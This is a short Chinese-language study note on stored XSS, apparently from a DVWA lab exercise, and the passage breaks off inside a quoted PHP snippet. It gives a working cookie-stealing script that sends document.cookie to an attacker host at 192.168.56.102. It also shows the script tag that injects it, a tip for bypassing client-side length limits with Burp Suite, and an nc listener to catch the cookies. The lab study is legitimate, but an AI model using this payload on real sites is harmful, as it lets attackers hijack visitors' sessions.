存储型XSS
1、可长期存储于服务器端
2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口
#攻击利用方法大体等于反射型xss利用
##多出现在留言板等位置
*推荐使用burpsuite
a、观察返回结果,是否原封不动地返回输入数据?是否有其他标签
js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗
注入后会永久在服务器端,每次访问都会下发该注入。
用dvwa测试的时候消除注入需在设置中重置数据库
b、测试加载攻击者控制的服务器中的js文件
#启动apache2【默认侦听80端口】
a.js 【盗取客户端cookie信息,并把它上传到攻击者控制的服务器的PHP文件】
var img = new Image();
img.src = "http://192.168.56.102:88/cookies.php?
cookie="+document.cookie;
***默认在客户端进行长度的限制,可用burpsuite进行绕过或直接修改HTML代码中的长度限制 【安全性好的,同时在客户端跟服务器端进行长度限制】
<script src="http://192.168.56.102/a.js"></script>
使用nc演示效果,侦听88端口,提交成功/刷新页面,即可成功获得cookie
代码审计 【以下代码只是对输入数据进行过滤】
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mtxMessage']);
$name = trim($_POST['txtName']);
// Sanitize message input
$me